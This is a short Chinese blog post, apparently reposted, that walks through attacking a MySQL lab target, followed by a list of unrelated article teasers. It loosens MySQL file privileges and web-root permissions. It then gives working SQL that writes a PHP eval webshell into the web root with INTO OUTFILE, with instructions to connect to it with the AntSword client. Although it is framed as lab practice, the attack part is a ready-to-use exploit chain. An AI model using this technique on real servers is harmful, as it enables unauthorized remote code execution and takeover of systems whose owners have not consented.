MySQL靶场攻击

server/2024/10/10 19:15:50/

靶场搭建

修改配置文件

vim /etc/my.cof

   

[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1

   

安装相关环境

yum install php php-mysql -y

   

添加配置

vim /etc/httpd/conf/httpd.conf

   

AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php

   

重启相关服务

systemctl restart httpd

   

修改权限

chmod -R o+w /var/www

   

攻击

use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

   

访问 IP/ma.php

蚁剑连接

作 者:PeiyuJue
链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载! 


http://www.ppmy.cn/server/100412.html

相关文章

Spring Boot优缺点

Spring Boot 是一款用于简化Spring应用开发的框架&#xff0c;它集成了大量常用的框架和工具&#xff0c;大大简化了Spring项目的配置和部署。下面是Spring Boot的优缺点&#xff1a; 优点&#xff1a; 简化配置&#xff1a;Spring Boot自动配置功能可以根据应用的依赖自动配…

使用Gitea搭建git本地服务器

前言 作为一个程序员&#xff0c;我认为代码管理是很重要的&#xff0c;在项目开发过程中&#xff0c;随着代码的不断更新迭代&#xff0c;可能已经不知道一开始的代码是什么样子了&#xff0c;又或者时间久了不知道自己改了什么&#xff0c;而git就是一个很好的代码管理工具&a…

SpringBoot快速入门(手动创建)

目录 案例&#xff1a;需求 步骤 1 创建Maven项目 2 导入SpringBoot起步依赖 3 定义Controller 4 编写引导类 案例&#xff1a;需求 搭建简单的SpringBoot工程&#xff0c;创建hello的类定义h1的方法&#xff0c;返回Hello SpringBoot! 步骤 1 创建Maven项目 大家&…

分享|华为测试OD岗面试流程

作者&#xff1a;DLAM 链接&#xff1a;leetcode.cn/circle/discuss/XpySJs/ 抱着试一试的心态&#xff0c;面试了华为的OD岗位&#xff0c;误打误撞进入了总决赛&#xff0c;记录一下给各位友友&#xff0c;流程大概一个月&#xff0c;职级定D3&#xff0c;薪酬22K&#xff0…

fastjson反序列化漏洞

一、漏洞简介 Fastjson是阿里巴巴公司开源的一款高性能的Java语言JSON处理库&#xff0c;广泛应用于Web开发、数据交换等领域。然而&#xff0c;由于Fastjson在解析JSON数据时存在安全漏洞&#xff0c;攻击者可以利用该漏洞执行任意代码&#xff0c;导致严重的安全威胁。 二、…

平安城市/雪亮工程现状及需求分析:EasyCVR视频汇聚平台助力雪亮工程项目建设

一、背景现状 经过近几年的努力&#xff0c;平安城市雪亮工程建设取得了显著的成绩&#xff0c;完成了前端高清视频点位和高清卡口系统建设&#xff0c;建成了&#xff08;视频监控类&#xff09;、&#xff08;卡口类&#xff09;和&#xff08;应用类&#xff09;的平台。这…

003_c语言中怎么逐个获取一个字符串的字符?

【背景】 C中关于字符串的操作比较多&#xff0c;尤其是截取&#xff0c;拼接&#xff0c;组装等功能&#xff0c;那么我们今天就说一下&#xff0c;当我们遇到char str[] "hello world"; char* pstr "Goodthing.."等串的时候&#xff0c;如何去逐个获取…

数据库管理-第229期 Oracle全球分布式数据库-深入1(20240814)

数据库管理229期 2024-08-14 数据库管理-第229期 Oracle全球分布式数据库-深入1&#xff08;20240814&#xff09;1 场景2 混合部署模式3 数据复制3.1 分片级复制3.2 Raft复制 4 数据分布方式5 客户端请求路由6 查询过程总结 数据库管理-第229期 Oracle全球分布式数据库-深入1&…